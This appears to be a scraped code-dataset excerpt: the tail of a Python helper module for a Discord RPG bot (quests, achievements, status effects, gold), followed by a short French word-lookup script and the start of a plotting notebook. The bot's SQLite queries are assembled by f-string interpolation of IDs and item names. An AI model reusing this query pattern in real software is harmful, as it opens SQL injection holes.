AsyncWebhookAdapter\nimport aiohttp\nfrom PIL import Image\n\neffect_list = {\n \"shatter\" : \"Your mind has been shattered! Your messages are jumbled up!\",\n \"polymorph\" : \"You're a sheep! You can't speak human languages!\",\n \"drunk\" : \"You had a bit too much to drink...\",\n \"burning\" : \"You are on fire. Good luck.\",\n \"poisoned\" : \"Every time you make an attack, you lose an extra 2 AP!\",\n \"confidence\" : \"Hey, you're pretty good at this! Slightly raises your critical chance.\",\n \"inspired\" : \"You're amazing! Good job! Considerably raises your critical chance.\",\n \"defending\" : \"You are prepared for someone to strike! Anyone who attacks you fails, wasting their AP.\",\n \"wooyeah\" : \"**WOO YEAHIM ON A ROLL**\",\n \"shrouded\" : \"You're covered in some sort of shroud! It's harder for enemies to get a crit on you!\"\n}\n\nbase_classes = {\n 1 : 'Apprentice',\n 2 : 'Swordsman',\n 3 : 'Rogue',\n 4 : 'Archer',\n}\n\nprefix = ';'\n\nunobtainable_achs = 1\n\nwith open('adjectives.txt') as f:\n sheep_names = [line.rstrip() for line in f]\n\nbody_parts = ['bones', 'hair', 'fingernail', 'thumb', 'middle finger', 'big toe', 'knees', 'kneecap', 'bum', 'cheek', 'bumcheek', 'leg hair', 'skeleton', 'ligaments', 'muscles', 'tendons', 'teeth', 'mouth', 'tongue', 'larynx', 'esophagus', 'stomach', 'small intestine', 'large intestine', 'liver', 'gallbladder', 'mesentery', 'pancreas', 'anus', 'nasal cavity', 'pharynx', 'larynx', 'trachea', 'lungs', 'diaphragm', 'groin', 'kidneys', 'heart', 'spleen', 'thymus', 'brain', 'cerebellum', 'spine', 'eye', 'ear', 'arm', 'leg', 'chest', 'neck', 'toe', 'finger']\n\nmagnitudeDict={0:'', 1:'Thousand', 2:'Million', 3:'Billion', 4:'Trillion', 5:'Quadrillion', 6:'Quintillion', 7:'Sextillion', 8:'Septillion', 9:'Octillion', 10:'Nonillion', 11:'Decillion'}\n\ndef simplify(num):\n num=math.floor(num)\n magnitude=0\n while num>=1000.0:\n magnitude+=1\n num=num/1000.0\n return(f'{math.floor(num*100.0)/100.0} {magnitudeDict[magnitude]}')\n\nasync def add_effect(target, bot, effect_name, amount = 1):\n speaker = target.id\n if speaker not in bot.user_status:\n bot.user_status[speaker] = []\n user_effects = bot.user_status[speaker]\n exists = False\n for status in user_effects: # If the status exists, increment it.\n if status[0].lower() == effect_name.lower():\n exists = True\n status[1] += amount\n if not exists:\n bot.user_status[speaker].append([effect_name.lower(), amount])\n\nasync def find_origin(user_class):\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select class_name, preclass from classes;\") as chan:\n clss = await chan.fetchall()\n origin = user_class\n wcase = 0\n b_classes = [\"swordsman\", \"apprentice\", \"rogue\", \"archer\"]\n while origin not in b_classes:\n wcase +=1\n if wcase >= 10:\n break\n for item in clss:\n if item[0] == origin:\n origin = item[1]\n\n return(origin)\n\nasync def reply_check(message):\n if message.reference:\n return True\n else:\n return False\n\nasync def can_attack(user, target, ctx): # NOTE: Remember that you can't alter AP of those who have no profile in CC... Also, target may not always exist\n bot = ctx.bot\n if user not in bot.user_status:\n bot.user_status[user] = []\n user_effects = bot.user_status[user]\n for status in user_effects: \n if status[0].lower() == \"poisoned\":\n ### HANDLE STACKS\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[user].remove(status)\n else:\n status[1] -= 1\n ### APPLY EFFECT\n uid = str(user)\n balance = (bot.users_ap[uid] - 2)\n if balance >= 0:\n bot.users_ap[uid] = balance\n\n # UPDATE ATTACKING BASED QUESTS\n attack_based_quests = [7, 8, 9, 10, 11, 12, 13, 14]\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select currently_questing from users where id = '{ctx.author.id}';\") as chan:\n quest = await chan.fetchone()\n if quest:\n quest = quest[0]\n if quest in attack_based_quests:\n await update_quest(ctx.message, quest, 1, ctx.bot)\n # UPDATE ATTACKING BASED QUESTS\n\n # CHECK FOR DEFENDING AND MORE\n \"\"\"\n Priority List\n 1. Sellsword\n 2. Status Effects\n \"\"\"\n\n protected = bot.get_cog('sellsword').hired\n\n if target in list(protected.values()):\n vals = list(protected.values())\n keys = list(protected.keys())\n protector = keys[vals.index(target)]\n try:\n ss_hooks = [\n \"Right as you're about to attack, you feel a stab in your back! It's usr1, usr2's sellsword! You fall over, dead!\",\n \"You attempt to kill usr2, but usr1 blocks your attack before swiftly slicing your neck! usr2 nods at usr1, and continues on their way.\",\n \"Your attempt to attack usr2 is thwarted by usr1, who fires a crossbow bolt into your neck right as you're about to land your attack!\",\n \"usr2 sees your attack coming, but doesn't seem worried. Perplexed, you attempt to attack anyway! As you do, you feel usr1's blade through your back! usr2 smiles at you as the world goes dark.\"\n ]\n usr1 = bot.get_user(protector)\n usr2 = bot.get_user(target)\n hook = random.choice(ss_hooks)\n hook = hook.replace(\"usr1\", f\"**{usr1.name}**\")\n hook = hook.replace(\"usr2\", f\"**{usr2.display_name}**\")\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select coolness from users where id = '{protector}';\") as current_amount:\n coolness = await current_amount.fetchone()\n await conn.execute(f\"update users set coolness = '{coolness[0]+100}' where id = '{protector}';\")\n await conn.commit()\n await ctx.send(\"**[BLOCKED] | **\" + hook)\n except:\n await ctx.send(\"Your attempt to attack fails as their sellsword protects them, stabbing you instead!\")\n return False\n\n if target not in bot.user_status:\n bot.user_status[target] = []\n user_effects = bot.user_status[target]\n for status in user_effects: \n if status[0].lower() == \"defending\":\n ### HANDLE STACKS\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[user].remove(status.lower())\n else:\n status[1] -= 1\n ### APPLY EFFECT\n await ctx.send(\"You attempt to attack, but you cannot penetrate their defenses! Your attack fails!\")\n return False\n # CHECK FOR DEFENDING AND MORE\n\n return True\n\nasync def crit_handler(bot, attacker, defender, boost = None): \n # Values needed for later ############################################################ #\n crit_thresh = 1 # The number needed to roll below to get a critical #\n crit_max = 20 # The maximum nuber that the critical will be rolled on #\n ########################################################################################\n # We will now check for the person being attacked's status effects, to see if they have#\n # some sort of protective status effect. #\n ########################################################################################\n \n speaker = defender\n force_crit = None\n if speaker in bot.user_status:\n user_effects = bot.user_status[speaker]\n for status in user_effects: # We go through each status affecting the user [NOT ALL APPLY TO ON-MESSAGE EVENTS. THEREFORE, WE NEED IF STATEMENTS]. These are applied in order\n if status[0].lower() == \"shrouded\":\n crit_max += 10\n force_crit = random.randint(1,crit_max) \n ### HANDLE STACKS\n if not(force_crit <= crit_thresh):\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[speaker].remove(status)\n else:\n status[1] -= 1\n ### Now we check for the rest of the stuff #\n if boost: #\n if boost > 0: #\n crit_thresh += boost #\n else: #\n crit_max += boost #\n ### #\n if force_crit != None:\n crit = force_crit\n else:\n crit = random.randint(1,crit_max) # The rolled critical chance #\n # End Values #\n ###################################################################################### #\n ###################################################################################### #\n # Getting user status effects to check for critical-altering ones ### \n # THESE ARE FOR POSITIVE EFFECTS #\n speaker = attacker\n if speaker in bot.user_status:\n user_effects = bot.user_status[speaker]\n for status in user_effects: # We go through each status affecting the user [NOT ALL APPLY TO ON-MESSAGE EVENTS. THEREFORE, WE NEED IF STATEMENTS]. These are applied in order\n if status[0].lower() == \"confidence\":\n crit_thresh += 4\n ### HANDLE STACKS\n if crit <= crit_thresh:\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[speaker].remove(status)\n else:\n status[1] -= 1\n elif status[0].lower() == \"inspired\":\n crit_thresh += 8\n ### HANDLE STACKS\n if crit <= crit_thresh:\n remaining_stacks = status[1]-1\n if remaining_stacks <= 0:\n bot.user_status[speaker].remove(status)\n else:\n status[1] -= 1\n # End Status Effect Check ############################################\n ######################################################################\n if crit <= crit_thresh:\n ########################################################################################\n # This is for classes that have \"when someone gets a crit on you\" effects. #############\n if str(defender) in bot.users_classes:\n if bot.users_classes[str(defender)] == \"pacted\":\n if await get_demon(defender, bot) == \"minehart\":\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from users where id = '{defender}';\") as info:\n user = await info.fetchone()\n level = user[8] - 19\n\n amount = 2*level \n cog = bot.get_cog('pacted')\n cog.minehart[defender] = cog.minehart[defender] + amount\n\n ########################################################################################\n ########################################################################################\n return True\n else:\n return False\n\ndef max_xp(lvl):\n return 20 * (lvl ^ 35) + 250 * lvl + 25\n\ndef max_xp_skills(lvl):\n return 85 * (lvl ^ 70) + 350 * lvl + 50\n\nasync def give_faction_points(contributor = None, f_id = None, amount = 0):\n async with aiosqlite.connect('unique.db') as conn:\n async with conn.execute(f\"select faction_points from factions where faction_id = {f_id}\") as u_info:\n faction_points = await u_info.fetchone()\n\n faction_points = faction_points[0] + amount\n if faction_points < 0:\n faction_points = 0\n\n async with aiosqlite.connect('unique.db') as conn:\n await conn.execute(f\"update factions set faction_points = {faction_points} where faction_id = {f_id};\")\n await conn.commit()\n\nasync def alter_items(uid, ctx, bot, item, change = 1, cost = 0):\n item = item.lower()\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select gold from users where id = '{uid}'\") as u_info:\n user_info = await u_info.fetchone()\n\n gold = user_info[0]\n \n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select item_name, amount from inventory where uid = '{ctx.author.id}'\") as u_info:\n user_info = await u_info.fetchall()\n\n inv = user_info\n\n# [('void', 1), ('hot dog', 5)]\n\n items = [item[0] for item in inv] # Array of just the names of the items in the 2D array.\n end = \"\"\n\n if gold - cost < 0:\n await ctx.send(\"You cannot afford this item!\")\n else:\n if item in items:\n indx = items.index(item.lower())\n item_amount = int(inv[indx][1]) + change\n if item_amount >= 10:\n await award_ach(14, ctx.message, bot)\n\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update inventory set amount = {item_amount} where uid = {uid} and item_name = '{item.lower()}';\")\n await conn.commit()\n \n elif item not in items:\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"insert into inventory values({ctx.author.id}, '{item.lower()}', {change});\")\n await conn.commit()\n \n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set gold = {gold - cost} where id = '{uid}';\")\n await conn.commit()\n if cost > 0:\n await ctx.send(f\"✅ | Purchase complete! Your gold balance is now {gold-cost}.\")\n\nasync def alter_ap(message, ap, bot):\n if str(message.author.id) in bot.registered_users:\n uid = str(message.author.id)\n balance = (bot.users_ap[uid] - ap)\n if balance >= 0:\n bot.users_ap[uid] = balance\n return True\n else:\n await message.channel.send(\"You don't have enough AP to do that! Buy some refreshers from the shop, do some quests, or wait until rollover!\")\n return False\n\nasync def xp_handler(message, bot, boost = 0):\n testing = False\n if boost:\n num = 4\n xp_amount = boost\n \n else: \n num = random.randint(1,4)\n if message.author.id in bot.server_boosters or message.author.id == 217288785803608074:\n xp_amount = round(1.75*(random.randint(5,50)))\n else:\n xp_amount = random.randint(5,100)\n\n if message.guild.id == 732632186204979281:\n xp_amount *= 2\n\n if num == 4:\n if str(message.author.id) in bot.registered_users:\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select exp, level from users where id = '{message.author.id}';\") as profile:\n prof = await profile.fetchone()\n xp = prof[0] + xp_amount\n current_lvl = prof[1]\n if xp >= max_xp(current_lvl) and ((prof[1]+1) % 10 != 0):\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set exp = 0 where id = '{message.author.id}'\")\n await conn.execute(f\"update users set level = {current_lvl + 1} where id = '{message.author.id}'\")\n await conn.commit()\n embed = discord.Embed(title=f\"✨ Level up! ✨\", colour=discord.Colour.from_rgb(255, 204, 153), description=f'You are now level {prof[1]+1}! Good job!')\n embed.set_thumbnail(url=message.author.avatar_url)\n notif = await message.channel.send(content=message.author.mention, embed=embed)\n await notif.delete(delay=10)\n elif xp >= max_xp(current_lvl) and ((prof[1]+1) % 10 == 0):\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set exp = {max_xp(current_lvl)} where id = '{message.author.id}'\")\n await conn.commit()\n if message.author.id not in bot.notified:\n bot.notified.append(message.author.id)\n embed = discord.Embed(title=f\"✨ Level up! ✨\", colour=discord.Colour.from_rgb(255, 204, 153), description=f'You can now level up to {prof[1]+1}! Good job!')\n embed.set_thumbnail(url=message.author.avatar_url)\n embed.set_footer(text=f\"A class up is available! Run {prefix}classup when you are ready.\", icon_url=\"https://lh3.googleusercontent.com/proxy/OrYbJO2bKqGtVPcWnue8XK0SRnHoC-h8VHKNTw9JoVk-k_mke8bcurTQgoKd70H_kgr9AR2CQH-GRgckkZqXbRbdf-CZgjac\")\n notif = await message.channel.send(content=f'{message.author.mention}', embed=embed)\n await notif.delete(delay=10) \n else:\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set exp = {xp} where id = '{message.author.id}'\")\n await conn.commit()\n \n\nasync def webhook_safe_check(channel): # This function should be run before any webhook command in main.py. It makes sure that the channel has a webhook, and if it doesn't, it creates one.\n seeking_id = channel.id\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from webhooks where channel_id = '{seeking_id}';\") as chan:\n hook = await chan.fetchone()\n if hook:\n return hook[1]\n else:\n new_hook = await channel.create_webhook(name=f\"Chat Classes {channel.name} Webhook\")\n await conn.execute(f\"insert into webhooks values('{channel.id}', '{new_hook.url}')\")\n await conn.commit()\n return new_hook.url\n\nbasic_text_quests = [1,2,3,4,5,6,15,16,17]\nasync def on_message_quest_handler(user, mss, people, bot): # This takes the message sent, checks if it's applicable to any quest. I just put it here instead of main.py honestly.\n uid = str(user.id)\n if uid in people:\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select completed_quests, currently_questing from users where id = '{uid}';\") as chan:\n quest = await chan.fetchone()\n if quest:\n if quest[1] != 0: # If the user has a quest...\n if quest[1] in basic_text_quests:\n await update_quest(mss, quest[1], 1, bot)\n\nasync def update_quest(message, quest_id, addition, bot, silent = False):\n if addition > 0: # Setting addition to 0 will fail their quest.\n chan = message.channel\n user = message.author\n notif = None # To prevent locked db errors.\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from quests where quest_id = {quest_id}\") as q_info:\n quest_info = await q_info.fetchone()\n\n questers = quest_info[5].split(\"|\")\n\n for guy in questers:\n new_guy = guy.split(\",\")\n questers[questers.index(guy)] = new_guy # I don't want to comment this and I know I will regret this. \n # print(f\"I am setting {new_guy} up to replace {guy}.\")\n\n found = False\n for new_guy in questers: # Have to do this in a seperate loop to prevent a critical error.\n if new_guy[0] == str(user.id):\n found = True\n new_guy[1] = str(int(new_guy[1]) + addition)\n \n if int(new_guy[1]) >= int(quest_info[7]):\n questers.pop(questers.index(new_guy))\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select completed_quests from users where id = '{message.author.id}'\") as count:\n old_count = await count.fetchone()\n new_count = old_count[0] + 1\n await conn.execute(f\"update users set completed_quests = {new_count} where id = '{message.author.id}';\")\n await conn.commit()\n async with aiosqlite.connect('main.db') as conn:\n if quest_info[2] == \"coolness\": # REWARD TYPES!\n async with conn.execute(f\"select coolness from users where id = '{message.author.id}'\") as coolness:\n old_cool = await coolness.fetchone()\n new_cool = old_cool[0] + int(quest_info[3])\n await conn.execute(f\"update users set coolness = {new_cool} where id = '{message.author.id}';\")\n await conn.commit() \n reward = f\"+{quest_info[3]} Coolness\"\n elif quest_info[2] == \"xp\": \n async with conn.execute(f\"select exp from users where id = '{message.author.id}'\") as exp:\n old_exp = await exp.fetchone()\n new_exp = old_exp[0] + int(quest_info[3])\n await conn.execute(f\"update users set exp = {new_exp} where id = '{message.author.id}';\")\n await conn.commit() \n reward = f\"+{quest_info[3]} XP\"\n elif quest_info[2] == \"gold\": \n async with conn.execute(f\"select gold from users where id = '{message.author.id}'\") as exp:\n old_cash = await exp.fetchone()\n amount = int(quest_info[3])\n if message.author.id in bot.server_boosters and amount > 0:\n amount *= 2\n new_cash = old_cash[0] + amount\n await conn.execute(f\"update users set gold = {new_cash} where id = '{message.author.id}';\")\n await conn.commit() \n reward = f\"+{quest_info[3]} Gold\"\n else:\n pass\n\n await conn.execute(f\"update users set currently_questing = 0 where id = '{message.author.id}';\")\n await conn.commit()\n\n embed = discord.Embed(title=f\"Quest Complete!\", colour=discord.Colour.from_rgb(166, 148, 255), description=f'**{quest_info[6]}**\\n*{quest_info[1]}*')\n embed.set_footer(text=reward, icon_url=\"\")\n embed.set_thumbnail(url=quest_info[4])\n notif = await chan.send(content=message.author.mention, embed=embed)\n if notif:\n await notif.delete(delay=10)\n\n end = \"\"\n for sublist in questers:\n if questers.index(sublist) == len(questers)-1:\n end += f\"{','.join(sublist)}\"\n else:\n end += f\"{','.join(sublist)}|\"\n\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update quests set users = '{end}' where quest_id = '{quest_id}';\")\n await conn.commit()\n\n if found == False:\n print(\"Locked. Probably.\")\n for i in range(0,50): # Try only 50 times.\n while True:\n try:\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update users set currently_questing = 0 where id = '{message.author.id}';\")\n await conn.commit()\n except ValueError:\n continue\n break\n else:\n chan = message.channel\n user = message.author\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select * from quests where quest_id = {quest_id}\") as q_info:\n await conn.execute(f\"update users set currently_questing = 0 where id = '{message.author.id}';\")\n quest_info = await q_info.fetchone()\n await conn.commit()\n \n questers = quest_info[5].split(\"|\")\n\n for guy in questers:\n new_guy = guy.split(\",\")\n questers[questers.index(guy)] = new_guy\n\n for new_guy in questers: # Have to do this in a seperate loop to prevent a critical error.\n if new_guy[0] == str(user.id):\n found = True\n questers.pop(questers.index(new_guy))\n \n end = \"\"\n for sublist in questers:\n if questers.index(sublist) == len(questers)-1:\n end += f\"{','.join(sublist)}\"\n else:\n end += f\"{','.join(sublist)}|\"\n\n async with aiosqlite.connect('main.db') as conn:\n await conn.execute(f\"update quests set users = '{end}' where quest_id = '{quest_id}';\")\n await conn.commit()\n\n if silent:\n pass\n else:\n embed = discord.Embed(title=f\"Quest Failed!\", colour=discord.Colour.from_rgb(166, 148, 255), description=f'**{quest_info[6]}**\\n*{quest_info[1]}*')\n embed.set_thumbnail(url=quest_info[4])\n await chan.send(content=message.author.mention, embed=embed)\n \n \n\n\n\n###################################################################\n###################################################################\n################## ACHIEVEMENT HANDLING ###########################\n###################################################################\n###################################################################\n\nnecromancer_triggers = [\n \"i want to die\",\n \"i died\",\n \"i am dead\",\n \"i am dying\",\n \"i am going to die\",\n \"i dieded\",\n \"want to be a necromancer\",\n \"wish i was a necromancer\"\n]\n\nold_bot_triggers = [\n \"robo head\",\n \"asami\",\n \"skeletor\",\n \"robo_head\",\n \"runebot\",\n \"rune bot\",\n \"waifu battles\"\n]\n\njanitor_triggers = [\n \"frick\",\n \"heck\",\n \"darn\",\n \"h*ck\",\n]\n\n\nasync def txt_achievement_handler(content, uid, message_obj, bot): # This is going to be a long mess... This is the handler for text-based achievements ONLY! \n unlocked = bot.registered_users[str(uid)]\n ach_id = 0\n if any(trg in content for trg in necromancer_triggers) and 1 not in unlocked:\n ach_id = 1\n elif \"@everyone\" in content and 2 not in unlocked:\n ach_id = 2\n elif \"a\" in content and content != f\"{prefix}start\" and 3 not in unlocked:\n ach_id = 3\n elif \"<@!713506775424565370>\" in content or \"<@713506775424565370>\" in content and 4 not in unlocked:\n ach_id = 4\n elif message_obj.guild.id == 732632186204979281 and 5 not in unlocked:\n ach_id = 5\n elif content == \"<@!217288785803608074>\" or content == \"<@217288785803608074>\" and 6 not in unlocked:\n ach_id = 6\n elif any(trg in content for trg in old_bot_triggers) and 7 not in unlocked:\n ach_id = 7\n elif any(trg in content for trg in janitor_triggers) and 8 not in unlocked:\n ach_id = 8\n elif \"no tomb can hold me\" in content and 10 not in unlocked:\n ach_id = 10\n elif \"groovy\" in content and 11 not in unlocked:\n ach_id = 11\n\n # Above determines which achievement has been obtained. Below takes that id and sends the embed as well as awarding the achievement.\n \n if ach_id != 0 and ach_id not in unlocked:\n await award_ach(ach_id, message_obj, bot)\n\n\nasync def add_coolness(uid, amount):\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select coolness from users where id = '{uid}';\") as current_amount:\n coolness = await current_amount.fetchone()\n await conn.execute(f\"update users set coolness = '{coolness[0]+amount}' where id = '{uid}';\")\n await conn.commit()\n\nasync def add_gold(uid, amount, bot, debt_mode = False, purchase_mode = None, boost_null = False):\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select gold from users where id = '{uid}';\") as current_amount:\n gold = await current_amount.fetchone()\n\n if uid in bot.server_boosters and amount > 0 and boost_null == False:\n amount *= 2\n else:\n amount *= 1\n\n final = gold[0]+amount\n if final < 0 and debt_mode == False and purchase_mode == None:\n final = 0\n if final < 0 and purchase_mode != None:\n await purchase_mode.send(\"You cannot afford this!\")\n raise SyntaxError\n await conn.execute(f\"update users set gold = '{final}' where id = '{uid}';\")\n await conn.commit()\n\nasync def award_ach(ach_id, message, bot):\n uid = message.author.id\n unlocked = bot.registered_users[str(uid)]\n if ach_id not in unlocked:\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select achievements from users where id = '{uid}';\") as person:\n user_ach = await person.fetchone() # While these lines are repeats from the txt_achievement_handler, this function can be used in other lines of code to award achievements, so this unfortunate redundancy has to stay for now.\n user_ach = user_ach[0].split(\"|\")\n user_ach.append(str(ach_id))\n user_ach = '|'.join(user_ach)\n await conn.execute(f\"update users set achievements = '{user_ach}' where id = '{uid}'\")\n await conn.commit()\n \n async with conn.execute(f\"select * from achievements where id = '{ach_id}'\") as ach:\n ach_info = await ach.fetchone()\n embed = discord.Embed(title=f\"Achievement Unlocked!\", colour=discord.Colour.from_rgb(255,200,0), description=f'**\"{ach_info[1]}\"**\\n*{ach_info[2]}*')\n embed.set_thumbnail(url=ach_info[3])\n amount = ach_info[4]\n embed.set_footer(text=f\"+{amount} Coolness\", icon_url=\"\")\n # await asyncio.sleep(random.randint(30,100))\n async with conn.execute(f\"select coolness from users where id = '{uid}';\") as current_amount: # Can't run the function for this due to overloading the db\n coolness = await current_amount.fetchone()\n await conn.execute(f\"update users set coolness = '{coolness[0]+amount}' where id = '{uid}';\")\n await conn.commit()\n async with conn.execute(f\"select id, achievements from users;\") as people:\n usrs = await people.fetchall()\n for guy in usrs: # Regenerate the list of people with achievements.\n user_ach = guy[1].split(\"|\")\n unlocked = []\n for stringnum in user_ach: # Just for the if statement. I really hate this and want to fix it eventually.\n unlocked.append(int(stringnum))\n \n bot.registered_users[guy[0]] = unlocked\n\n mss = await message.channel.send(content=message.author.mention, embed=embed)\n await mss.delete(delay=10)\n \nasync def fetch_random_quest(message, bot, uid=None, override=False):\n # Random quest encounter chance time!\n if uid:\n uid = str(uid.id)\n else:\n uid = str(message.author.id)\n if uid in bot.registered_users:\n chance = random.randint(1,100)\n if override:\n chance = 52\n if chance == 52: \n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(f\"select currently_questing from users where id = '{uid}';\") as people:\n usrs = await people.fetchall()\n if usrs != []:\n if usrs[0][0] == 0: # If they don't have a quest...\n async with conn.execute(\"select count(*) from quests;\") as numcount:\n num = await numcount.fetchone()\n total_quests = num[0]\n chosen_quest = random.randint(1, total_quests)\n async with conn.execute(f\"select * from quests where quest_id = {chosen_quest}\") as q_info: # Why not select just the users? In case I want to do something with the quest info later. Futureproofing, I suppose.\n quest_info = await q_info.fetchone()\n questers = quest_info[5]\n questers += f\"{uid},0|\"\n await conn.execute(f\"update quests set users = '{questers}' where quest_id = {chosen_quest};\")\n await conn.execute(f\"update users set currently_questing = {chosen_quest} where id = '{uid}';\")\n await conn.commit()\n embed = discord.Embed(title=f\"New Quest!\", colour=discord.Colour.from_rgb(255,200,0), description=f\"**{quest_info[6]}**\\n*{quest_info[1]}*\") \n embed.set_thumbnail(url=quest_info[4])\n embed.set_footer(text=f\"Reward: {quest_info[2].title()} ({quest_info[3]})\", icon_url=\"\")\n notif = await message.channel.send(content=message.author.mention, embed=embed)\n await notif.delete(delay=5)\n\n#########################################################\n#########################################################\n#########################################################\n#########################################################\n#########################################################\n\nasync def genprof(uid, aps, bot):\n person = uid\n async with aiosqlite.connect('main.db') as conn:\n async with conn.execute(\"select count(*) from achievements;\") as numcount:\n num = await numcount.fetchone()\n num_not = unobtainable_achs\n total_achievements = num[0]-num_not # Self explanatory.\n async with conn.execute(f\"select * from users where id = '{uid.id}';\") as info:\n user = await info.fetchone()\n\n profile = discord.Embed(title=f\"{uid.display_name}'s Profile\", colour=discord.Colour(0x6eaf0b), description=\"\")\n profile.set_thumbnail(url=uid.avatar_url)\n ###\n user_ach = user[6].split(\"|\")\n user_ach = len(user_ach)-1\n clss = user[1].replace(\"_\",\" \")\n clss = clss.title()\n ###\n profile.set_footer(text=f\"Global Coolness Ranking: {await genrank(uid.id)}\", icon_url=\"\")\n profile.add_field(name=\"Class & Level\", value=f'{user[1].title()} ║ Level {user[8]}', inline=False)\n\n # Faction stuff\n if person.id in bot.users_factions.keys():\n faction = bot.users_factions[person.id]\n cog = bot.get_cog('factions')\n if faction in cog.factions.keys():\n fac_info = cog.factions[faction]\n i_rgb = fac_info[6].split(\"|\")\n r = int(i_rgb[0])\n g = int(i_rgb[1])\n b = int(i_rgb[2])\n\n color = discord.Colour.from_rgb(r, g, b)\n profile = discord.Embed(title=f\"{uid.display_name}'s Profile\", colour=color, description=\"\")\n profile.set_thumbnail(url=uid.avatar_url)\n profile.set_footer(text=f\"Global Coolness Ranking: {await genrank(uid.id)} | Faction: {fac_info[7]}\", icon_url=\"\")\n profile.add_field(name=\"Class & Level\", value=f'{user[1].title()} ║ Level {user[8]}', inline=False)\n profile.set_image(url=fac_info[5])\n else:\n pass\n\n\n\n profile.add_field(name=\"Coolness\", value=user[5])\n profile.add_field(name=\"Gold\", value=user[3])\n profile.add_field(name=\"Achievements\", value=f\"{user_ach} of {total_achievements} Unlocked ({int((user_ach/total_achievements)*100)}%)\", inline=False)\n profile.add_field(name=\"Experience\", value=f\"{user[2]} / {max_xp(user[8])} ({int((user[2]/max_xp(user[8]))*100)}%)\", inline=False)\n profile.add_field(name=\"Completed Quests\", value=user[9], inline=False)\n profile.add_field(name=\"Action Points\", value=aps[str(uid.id)], inline=False)\n # profile.add_field(name=) Put equipment here eventually\n \n return(profile)\n\nasync def genrank(uid):\n async with aiosqlite.connect('main.db') as con:\n async with con.execute(f\"select * from users order by coolness desc;\") as lb: # Get their coolness rank!\n stuff = await lb.fetchall()\n rank = 1\n for usr in stuff:\n if usr[0] == str(uid):\n break\n else:\n rank+=1\n return(rank)\n\nasync def get_demon(uid, bot):\n cog = bot.get_cog('pacted')\n users_demons = cog.users_demons\n if uid in users_demons:\n demon = users_demons[uid]\n if demon == \"minehart\" and uid not in cog.minehart:\n cog.minehart[uid] = 0\n else:\n async with aiosqlite.connect('classTables.db') as conn:\n async with conn.execute(f\"select uid, demon from pacted_demons where uid = '{uid}'\") as u_info:\n user_info = await u_info.fetchone()\n if user_info:\n users_demons[uid] = user_info[1]\n cog.users_demons = users_demons\n demon = user_info[1]\n if demon == \"minehart\" and uid not in cog.minehart:\n cog.minehart[uid] = 0\n elif user_info == None:\n demon = None\n return demon","repo_name":"Caldraeus/chat-classes","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":38425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"10308919961","text":"import random\r\nimport pyperclip\r\n\r\nwhile True:\r\n word = input(\"Entrez le mot : \")\r\n print(\"Recherche de mot en cours...\")\r\n\r\n with open(\"D:\\Desktop\\Python_Project\\Jeu De Mot\\ods6.txt\",\"r\") as file:\r\n data = file.readlines()\r\n\r\n correct_word = []\r\n\r\n for i in data:\r\n if word.upper() in i:\r\n correct_word.append(i) \r\n if correct_word == []:\r\n print(\"Votre mot n'est pas dans la liste !\")\r\n \r\n result = random.choice(correct_word) \r\n print(\"\\n Votre mot est : \"+result)\r\n \r\n cop = input(\"Voulez vous copier votre mot ? {O/N} : \")\r\n while cop not in (\"O\",\"N\"):\r\n cop = input(\"Vous devez répondre par une valeur correcte ! {O/N} : \")\r\n if cop == \"O\":\r\n up_lo = input(\"Voulez vous que votre mot soit en miniscule ? {O/N} : \")\r\n while up_lo not in (\"O\",\"N\"):\r\n up_lo = input(\"Vous devez répondre par une valeur correcte ! {O/N} : \")\r\n if up_lo == \"O\":\r\n pyperclip.copy(result.lower())\r\n print(\"Mot copié en miniscule avec succès !\")\r\n elif up_lo == \"N\":\r\n pyperclip.copy(result)\r\n print(\"Mot copié avec succès !\")\r\n \r\n elif cop == \"N\":\r\n pass\r\n \r\n cont = input(\"Voulez vous continuer ? {O/N} : \")\r\n while cont not in (\"O\",\"N\"):\r\n cont = input(\"Vous devez répondre par une valeur correcte ! {O/N} : \")\r\n if cont == \"O\":\r\n continue\r\n if cont == \"N\":\r\n print(\"Bye ! En espérant te revoir prochainement.\")\r\n break","repo_name":"FlenderrAX/PunGenerator","sub_path":"jeu_de_mot.py","file_name":"jeu_de_mot.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"14231478077","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Manhattan & QQ plot\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib import gridspec\nfrom scipy.stats.mstats import mquantiles\nfrom scipy.stats import beta\nfrom scipy.stats import linregress\n\n\n# 